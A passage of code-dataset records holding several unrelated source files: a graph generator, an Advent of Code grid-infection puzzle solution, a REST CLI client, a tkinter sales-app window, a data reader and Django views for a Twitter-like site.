range(min_weight + 400, min_weight + 2000, 400): # 5\n# create_graph(num_vertices, p, min_weight, max_weight)\n#\n# # big graphs:\n# for num_vertices in range(1000, 10001, 1000): # 10\n# for power in numpy.arange(0.9, 1.1, 0.01): # 
200\n# p = (num_vertices**power)/(num_vertices * (num_vertices-1))\n# for min_weight in range(10000, 100001, 10000): # 10\n# for max_weight in range(min_weight, min_weight + 1000000, 100000): # 11\n# create_graph(num_vertices, p, min_weight, max_weight)\n", "sub_path": "ShortestCycles/ShortestCycles/create_directed_weighted_graphs.py", "file_name": "create_directed_weighted_graphs.py", "file_ext": "py", "file_size_in_byte": 1727, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "networkx.Graph", "line_number": 10, "usage_type": "call"}, {"api_name": "random.random", "line_number": 15, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "301895873", "text": "from enum import Enum\n\n\nclass Dir(Enum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n\n\nclass State(Enum):\n CLEAN = 0\n WEAKENED = 1\n INFECTED = 2\n FLAGGED = 3\n\n\nDIR_ORDER = [Dir.UP, Dir.RIGHT, Dir.DOWN, Dir.LEFT]\n\n\ndef turn(dir, diff):\n return DIR_ORDER[(DIR_ORDER.index(dir) + diff) % len(DIR_ORDER)]\n\n\ndef turn_left(dir):\n return turn(dir, -1)\n\n\ndef turn_right(dir):\n return turn(dir, +1)\n\n\ndef reverse_dir(dir):\n return turn(dir, +2)\n\n\ndef move(dir, x, y):\n if dir == Dir.UP:\n return x, y - 1\n elif dir == Dir.RIGHT:\n return x + 1, y\n elif dir == Dir.DOWN:\n return x, y + 1\n elif dir == Dir.LEFT:\n return x - 1, y\n\n\ndef run_virus(states, pos, dir, bursts):\n num_infected = 0\n for i in range(bursts):\n s = states.get(pos, State.CLEAN)\n if s == State.INFECTED:\n dir = turn_right(dir)\n states.pop(pos)\n else:\n dir = turn_left(dir)\n states[pos] = State.INFECTED\n num_infected += 1\n\n pos = move(dir, *pos)\n\n return num_infected\n\n\ndef run_virus_pt2(states, pos, dir, bursts):\n num_infected = 0\n for i in range(bursts):\n s = states.get(pos, State.CLEAN)\n if s == State.CLEAN:\n dir = turn_left(dir)\n states[pos] = State.WEAKENED\n elif s == State.WEAKENED:\n states[pos] = State.INFECTED\n num_infected += 1\n elif s == State.INFECTED:\n dir = turn_right(dir)\n states[pos] = State.FLAGGED\n elif s == State.FLAGGED:\n dir = reverse_dir(dir)\n states.pop(pos)\n\n pos = move(dir, *pos)\n\n return num_infected\n\n\ndef main():\n #with open('day22.input.txt') as f:\n # grid = [[c == '#' for c in line.strip()] for line in f.readlines()]\n\n grid = [[False, False, True], [True, False, False], [False, False, False]]\n\n height = len(grid)\n width = len(grid[0])\n pos = (width // 2, height // 2)\n dir = Dir.UP\n\n states = {}\n for y, row in enumerate(grid):\n for x, c in enumerate(row):\n if c:\n states[(x, y)] = State.INFECTED\n\n print(run_virus(states, pos, dir, 10000))\n\n print(run_virus_pt2(states, pos, dir, 100))\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "day22.py", "file_name": "day22.py", "file_ext": "py", "file_size_in_byte": 2296, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "163280468", "text": "#!/usr/bin/python\n\nimport click\nimport requests\nfrom utils import file_util\nimport os\n\njson_rest_header = {'Accept' : 'application/json', 'Content-Type' : 'application/json'}\n\n\n@click.group()\ndef cli():\n pass\n\ndef load_config():\n current_dir = os.path.dirname(os.path.realpath(__file__))\n config_file = os.path.join(current_dir, 
\"config.json\")\n config_json = file_util.load_json_file(config_file)\n return config_json\n\n@cli.command()\n@click.argument('path')\ndef rest_get(path):\n config = load_config()\n res = requests.get(config['restapi_url'] + path)\n print(res.json())\n\n@cli.command()\n@click.argument('path')\n@click.argument('json_data_file')\ndef rest_post(path, json_data_file):\n config = load_config()\n url = config['restapi_url'] + path\n payload = open(json_data_file, 'rb').read()\n res = requests.post(url, data=payload, headers=json_rest_header)\n print(res.json())\n\n\nif __name__ == '__main__':\n cli()\n", "sub_path": "cli/heycli.py", "file_name": "heycli.py", "file_ext": "py", "file_size_in_byte": 949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "click.group", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "utils.file_util.load_json_file", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.file_util", "line_number": 18, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 35, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 29, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "431049418", "text": "from tkinter import *\nimport PIL\nfrom PIL import Image\nfrom PIL import ImageTk\nfrom datetime import date\nfrom datetime import datetime\nimport time\nfrom Ventana_Ventas import *\nfrom Retiros import Retiro\nfrom Proveedores import Proveedores\nfrom Reporte import Reportes\nfrom ControlStock import Productos\nfrom UltimosMov import Movimientos\nfrom Acerca_de import AcercaDe\nfrom Efectivo_en_caja import Efectivo\nfrom Registro_empleados import Registro\nfrom tkinter import messagebox\n# encoding: utf-8\n\nventas = Ventas()\nretiro = Retiro()\nproveedores = Proveedores()\nreportes = Reportes()\nproductos = Productos()\nmovimientos = Movimientos()\nacercade= AcercaDe()\nefectivo = Efectivo()\nregistro = Registro()\n\nclass Programa:\n def __init__(self):\n self.titulo = \"Sistema de ventas\"\n self.icono = \"@../GrupoD-Proyecto/Iconos/Registradora.xbm\"\n self.resizable = False\n self.color = \"#83D6A8\"\n\n def Inicio(self):\n # Iniciar ventana\n ventana_principal = Tk()\n self.ventana_principal = ventana_principal\n # Titulo\n ventana_principal.title(self.titulo)\n # Tamano de la ventana\n ox,oy=ventana_principal.winfo_screenwidth()/5,ventana_principal.winfo_screenheight()/5\n ventana_principal.geometry(\"=960x650+%d+%d\" % (ox-30,oy-100) )\n # Bloquear el tamano\n if (self.resizable):\n ventana_principal.resizable(1, 1)\n else:\n ventana_principal.resizable(0, 0)\n # Agregar Icono\n ventana_principal.iconbitmap(self.icono)\n # Configuraciones\n self.ventana_principal.config(\n bg=self.color\n )\n #######################################################################################\n #Frame logo\n frame1 = LabelFrame(self.ventana_principal, text = \"Opciones Usuario\")\n frame1.config(\n bg = \"#83D6A8\",\n bd 
= 5,\n width = 200,\n height = 500,\n font = (\"Arial\",14)\n )\n frame1.place(x = 40, y = 120)\n #Frame Menu\n frame2 = LabelFrame(self.ventana_principal, text = \"Menú de opciones\")\n frame2.config(\n bg = \"#83D6A8\",\n bd = 5,\n width = 660,\n height = 500,\n font =(\"Arial\",14)\n )\n frame2.place(x = 260, y = 120)\n #Frame franja\n frame3 =Frame(self.ventana_principal)\n frame3.config(\n bg = \"#4089D1\",\n bd = 3,\n width = 880,\n height = 50\n )\n frame3.place(x = 40, y = 15)\n \n \n # Imagen\n #Dimensiones globales\n global ancho\n global largo\n ancho = 185\n largo = 150\n \n imagen = Image.open(\"./Iconos/Loguito.jpg\")\n imagen.thumbnail((ancho, largo), Image.ANTIALIAS)\n render = ImageTk.PhotoImage(imagen)\n label_imagen =Label(frame1, image=render,\n width=ancho, height=largo)\n label_imagen.config(\n bg = \"#83D6A8\"\n )\n label_imagen.place(x=0, y=0)\n \n ################# Botones Frame1 ############################\n boton_retiro = Button(frame1, text=\"Retiro\", command = retiro.Inicio)\n boton_retiro.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=43,\n pady = 2,\n bd=3\n\n )\n boton_retiro.place(x = 18, y = 160)\n ############################################################\n boton_reporte = Button(frame1, text=\"Reportes\",command = reportes.Inicio)\n boton_reporte.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=29,\n pady = 2,\n bd=3\n\n )\n\n boton_reporte.place(x = 20, y = 220)\n\n ############################################################## \n boton_empleados = Button(frame1, text=\"Empleados\", command = registro.Inicio)\n boton_empleados.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=19,\n pady = 2,\n bd=3\n\n )\n boton_empleados.place(x = 21, y = 280)\n ############################################################## \n boton_salir = Button(frame1, text=\"Salir\", command = quit)\n boton_salir.config(\n font=(\"Arial\", 14),\n relief=RAISED,\n padx=50,\n pady = 2,\n bd=3\n\n )\n \n boton_salir.place(x = 19, y = 340)\n\n ################## Botones Frame 2 ############################\n #Boton Ventas\n ancho = 140\n largo = 140\n img_boton = Image.open(\"./Iconos/carrito.jpg\")\n img_boton.thumbnail((ancho, largo), Image.ANTIALIAS)\n render1 = ImageTk.PhotoImage(img_boton)\n boton = Button(frame2,image = render1, text = \"Ventas\", compound = \"top\",command = ventas.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 20, y =50)\n #Boton Proveedores\n ancho = 140\n largo = 140\n img_boton2 = Image.open(\"./Iconos/Proveedores.jpg\")\n img_boton2.thumbnail((ancho, largo), Image.ANTIALIAS)\n render2 = ImageTk.PhotoImage(img_boton2)\n boton = Button(frame2,image = render2, text = \"Proveedores\", compound = \"top\",command = proveedores.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 240, y =50)\n \n #Boton Stock\n ancho = 140\n largo = 140\n img_boton3 = Image.open(\"./Iconos/Productos.jpg\")\n img_boton3.thumbnail((ancho, largo), Image.ANTIALIAS)\n render3 = ImageTk.PhotoImage(img_boton3)\n boton = Button(frame2,image = render3, text = \"Productos\", compound = \"top\",command = productos.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 460 , y =50)\n\n #Boton Dinero en Caja\n ancho = 140\n largo = 120\n img_boton5 = Image.open(\"./Iconos/Caja Fuerte.png\")\n img_boton5.thumbnail((ancho, largo), 
Image.ANTIALIAS)\n render5 = ImageTk.PhotoImage(img_boton5)\n boton = Button(frame2,image = render5, text = \"Efectivo en Caja\", compound = \"top\",command = efectivo.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 20 , y =270)\n\n #Boton Ultimos Movimientos\n ancho = 140\n largo = 120\n img_boton6 = Image.open(\"./Iconos/Ultimos Movimientos.jpg\")\n img_boton6.thumbnail((ancho, largo), Image.ANTIALIAS)\n render6 = ImageTk.PhotoImage(img_boton6)\n boton = Button(frame2,image = render6,text = \"Movimientos\",compound = \"top\",command =movimientos.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 240 , y =270)\n \n #Boton Acerca De\n ancho = 140\n largo = 120\n img_boton8 = Image.open(\"./Iconos/AcercaDe.png\")\n img_boton8.thumbnail((ancho, largo), Image.ANTIALIAS)\n render8 = ImageTk.PhotoImage(img_boton8)\n boton = Button(frame2,image = render8,text = \"Acerca de\",compound = \"top\",command = acercade.Inicio)\n boton.config(\n font = (\"Arial\", 14),\n width = 150,\n height = 160,\n relief = RAISED,\n bd = 4\n )\n boton.place(x = 460 , y =270)\n\n ###################### Textos ##############################\n texto = Label(self.ventana_principal, text = \"NOMBRE DEL NEGOCIO\")\n texto.config(\n bg =\"#83D6A8\",\n font = (\"Arial\", 20)\n )\n texto.place(x = 530,y=75)\n ###################### Fecha y hora ########################\n ###### Fecha #########\n fecha_actual = datetime.now()\n formato = fecha_actual.strftime('Fecha: %d / %m / %Y')\n fecha = Label(frame3, text = formato)\n fecha.config(\n bg = \"#4089D1\",\n font = (\"Arial\", 14)\n )\n fecha.place(x=210,y=0)\n ####### Hora ############\n def times():\n current_time = time.strftime('Hora: %H:%M:%S')\n hora.config(\n text = current_time,\n bg = \"#4089D1\",\n font = (\"Arial\", 14)\n )\n hora.after(200,times)\n\n hora = Label(frame3)\n hora.place(x= 450,y=0)\n times()\n self.ventana_principal.mainloop()\n\n", "sub_path": "Ventana_Inicio.py", "file_name": "Ventana_Inicio.py", "file_ext": "py", "file_size_in_byte": 8969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "Retiros.Retiro", "line_number": 21, "usage_type": "call"}, {"api_name": "Proveedores.Proveedores", "line_number": 22, "usage_type": "call"}, {"api_name": "Reporte.Reportes", "line_number": 23, "usage_type": "call"}, {"api_name": "ControlStock.Productos", "line_number": 24, "usage_type": "call"}, {"api_name": "UltimosMov.Movimientos", "line_number": 25, "usage_type": "call"}, {"api_name": "Acerca_de.AcercaDe", "line_number": 26, "usage_type": "call"}, {"api_name": "Efectivo_en_caja.Efectivo", "line_number": 27, "usage_type": "call"}, {"api_name": "Registro_empleados.Registro", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 96, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 96, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 97, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 97, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 98, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 98, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 158, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 158, "usage_type": "name"}, {"api_name": 
"PIL.Image.ANTIALIAS", "line_number": 159, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 159, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 160, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 160, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 173, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 173, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 174, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 174, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 175, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 175, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 189, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 189, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 190, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 190, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 191, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 191, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 205, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 205, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 206, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 206, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 207, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 207, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 221, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 221, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 222, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 222, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 223, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 223, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 237, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 237, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 238, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 238, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 239, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 239, "usage_type": "name"}, {"api_name": "datetime.datetime.datetime.now", "line_number": 259, "usage_type": "call"}, {"api_name": "datetime.datetime.datetime", "line_number": 259, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 259, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 269, "usage_type": "call"}]} +{"seq_id": "7810907", "text": "import os\nfrom .dataset import Dataset\n#tested manually\n\nclass DataReader:\n def __init__(self,path_to_file):\n self.path_to_file=os.path.abspath(path_to_file)\n\n\n def read(self):\n num_lines=[]\n\n file = open(self.path_to_file, 'r') \n lines = file.readlines()\n for line in lines:\n num_lines.append([float(num) for num in filter(None,line.split(\" \"))])\n # print(num_lines)\n return Dataset(num_lines)", "sub_path": "src/model_testing/data_processing/data_reader.py", "file_name": "data_reader.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": 
"14", "api": [{"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "dataset.Dataset", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "238581849", "text": "from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.template.response import TemplateResponse\nfrom django.http.response import HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.views.generic.edit import CreateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom .models import Tweet, Message, UserExtra\nfrom .forms import LoginForm, MessageForm, RegisterForm\nfrom django.db.models import Q\nfrom .serializers import TweetSerializer, MessageSerializer, UserExtraSerializer, UserSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.http import Http404\nfrom django.core.exceptions import ValidationError\nfrom django.contrib import messages\n\n\nclass HomeView(LoginRequiredMixin, View):\n def get(self, request):\n user = request.user\n watched = user.additional_data.watched.all()\n if watched:\n query = Q()\n for e in watched:\n query = query | Q(user=e)\n query = query | Q(user=user)\n tweets = Tweet.objects.order_by('create_date').reverse().filter(query)\n else:\n tweets = Tweet.objects.filter(user=user)\n \n# if user.additional_data.watched.all():\n# watched_users = user.additional_data.watched.all()\n# all_users = User.objects.all()\n# tweets = Tweet.objects.all()\n# for check_user in all_users:\n# if check_user not in watched_users:\n# tweets.exclude(user=check_user)\n# tweets.order_by('create_date')\n# tweets.reverse()\n# else:\n# tweets = user.tweet_set.order_by('create_date')\n ctx = {\"tweets\": tweets} \n \n return TemplateResponse(request, 'home.html', ctx)\n \n def post(self, request): \n tweets = Tweet.objects.all()\n ctx = {\"tweets\": tweets}\n \n return TemplateResponse(request, 'home.html', ctx)\n\n\nclass TweetView(LoginRequiredMixin, View):\n def get(self, request, pk): \n tweet = Tweet.objects.get(id=pk) \n ctx = {\"tweet\": tweet} \n \n return TemplateResponse(request, 'tweet.html', ctx)\n \n \nclass AddTweetView(LoginRequiredMixin, CreateView):\n model = Tweet\n fields = ['content']\n template_name = \"add_tweet.html\" \n success_url = \"/\"\n \n def form_valid(self, form):\n form.instance.user = self.request.user\n return super(AddTweetView, self).form_valid(form)\n\n\nclass MessageView(LoginRequiredMixin, View):\n \n def get(self, request):\n user = request.user\n to_messages = Message.objects.filter(to_user=user)\n from_messages = Message.objects.filter(from_user=user)\n form = MessageForm()\n\n ctx = {\"to_messages\": to_messages, \n \"from_messages\": from_messages,\n \"form\": form,\n \n }\n \n return TemplateResponse(request, 'messages.html', ctx)\n\n def post(self, request):\n form = MessageForm(request.POST)\n user = request.user\n if form.is_valid():\n if form.cleaned_data['to_user'] == user:\n to_messages = Message.objects.filter(to_user=user)\n from_messages = Message.objects.filter(from_user=user)\n form = MessageForm()\n ctx = {\"to_messages\": to_messages, \n \"from_messages\": from_messages,\n \"form\": form, \n \"msg\": \"Nie można wysłać wiadomości do samego siebie!\" \n } \n return TemplateResponse(request, 'messages.html', ctx)\n else:\n 
Message.objects.create(content = form.cleaned_data['content'], to_user=form.cleaned_data['to_user'], from_user=user)\n to_messages = Message.objects.filter(to_user=user)\n from_messages = Message.objects.filter(from_user=user)\n form = MessageForm()\n ctx = {\"to_messages\": to_messages, \n \"from_messages\": from_messages,\n \"form\": form, \n } \n return TemplateResponse(request, 'messages.html', ctx)\n\nclass ShowMessageView(LoginRequiredMixin, View):\n \n def get(self, request, pk):\n user = request.user\n message = Message.objects.get(id=pk)\n if message.is_read == False and message.to_user == user:\n message.is_read = True\n message.save()\n \n\n ctx = {\"message\": message,\n \"user\": user, \n }\n \n return TemplateResponse(request, 'show_message.html', ctx)\n\n\nclass ShowUsersView(LoginRequiredMixin, View):\n \n def get(self, request):\n users = User.objects.all()\n logged_user = request.user\n \n ctx = {\n \"users\": users,\n \"logged_user\": logged_user,\n }\n\n return TemplateResponse(request, 'show_users.html', ctx)\n\n def post(self, request):\n user = request.user\n user_id = user.id\n user_watched_id = request.POST['user_id']\n user_watched = User.objects.get(id=user_watched_id)\n user_extra = UserExtra()\n user_extra.user = user\n user_extra.save()\n user = User.objects.get(id = user_id)\n user.additional_data.watched.add(user_watched)\n user.save()\n \n return redirect(\"/show_users\")\n\n \nclass LogoutView(View):\n def get(self, request):\n logout(request)\n ctx = {'msg': \"Zostałeś wylogowany\"}\n return HttpResponseRedirect('/login', ctx)\n \n\nclass LoginView(View):\n def get(self, request):\n form = LoginForm()\n ctx = {\"form\": form}\n return TemplateResponse(request, 'login.html', ctx)\n \n def post(self, request):\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['user']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password = password)\n \n \n if user is not None:\n login(request, user)\n ctx = {'msg': 'Zostałeś zalogowany'}\n return HttpResponseRedirect('/', ctx)\n \n else:\n form = LoginForm()\n ctx = {'form':form, 'msg': 'Błędne dane. Nie jesteś zalogowany'}\n return TemplateResponse(request, 'login.html', ctx)\n \n else:\n ctx = {\"form\": form, 'msg':'Błędne dane. 
Nie jesteś zalogowany'}\n return TemplateResponse(request, 'login.html', ctx)\n \nclass RegisterView(View):\n def get(self, request):\n form = RegisterForm()\n ctx = {\"form\": form}\n return TemplateResponse(request, 'register.html', ctx)\n \n def post(self, request):\n form = RegisterForm(request.POST)\n if form.is_valid():\n if form.cleaned_data['password'] == form.cleaned_data['confirm_password']:\n username = form.cleaned_data['user']\n password = form.cleaned_data['password']\n email = form.cleaned_data['email']\n user = User.objects.create_user(username=username, email=email, password=password)\n user_extra = UserExtra()\n user_extra.user = user\n user_extra.save() \n login(request, user)\n return HttpResponseRedirect('/')\n else:\n# raise ValidationError('Błędne hasło')\n msg = \"Błędne hasło\"\n form = RegisterForm()\n ctx = {\"form\": form, \"msg\": msg}\n return TemplateResponse(request, 'register.html', ctx)\n \n else:\n ctx = {\"form\": form, 'msg': 'Błędne dane'}\n return TemplateResponse(request, 'register.html', ctx)\n \n \n\n# AJAX VIEWS\n\n\nclass HomeAjaxView(LoginRequiredMixin, View):\n def get(self, request):\n return TemplateResponse(request, 'home_ajax.html')\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n \n# API VIEWS\n\nclass HomeApiView(APIView):\n\n def get(self, request, format=None):\n user = request.user\n watched = user.additional_data.watched.all()\n if watched:\n query = Q()\n for e in watched:\n query = query | Q(user=e)\n query = query | Q(user=user)\n tweets = Tweet.objects.order_by('create_date').reverse().filter(query)\n else:\n tweets = Tweet.objects.filter(user=user)\n serializer = TweetSerializer(tweets, many=True, context={\"request\": request})\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = TweetSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n \n \n \n \n ", "sub_path": "my_app/twitter/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 9320, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Tweet.objects.order_by", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Tweet.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 32, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Tweet.objects.all", "line_number": 50, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 50, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", 
"line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 56, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 56, "usage_type": "name"}, {"api_name": "models.Tweet.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 58, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 61, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 64, "usage_type": "name"}, {"api_name": "django.views.generic.edit.CreateView", "line_number": 64, "usage_type": "name"}, {"api_name": "models.Tweet", "line_number": 65, "usage_type": "name"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 75, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 75, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 79, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 80, "usage_type": "name"}, {"api_name": "forms.MessageForm", "line_number": 81, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 89, "usage_type": "call"}, {"api_name": "forms.MessageForm", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Message.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 96, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 97, "usage_type": "name"}, {"api_name": "forms.MessageForm", "line_number": 98, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Message.objects.create", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 106, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 107, "usage_type": "name"}, {"api_name": "models.Message.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 108, "usage_type": "name"}, {"api_name": "forms.MessageForm", "line_number": 109, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 116, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 116, "usage_type": "name"}, {"api_name": 
"models.Message.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "models.Message.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "models.Message", "line_number": 120, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 130, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 133, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 133, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 136, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 136, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 144, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": 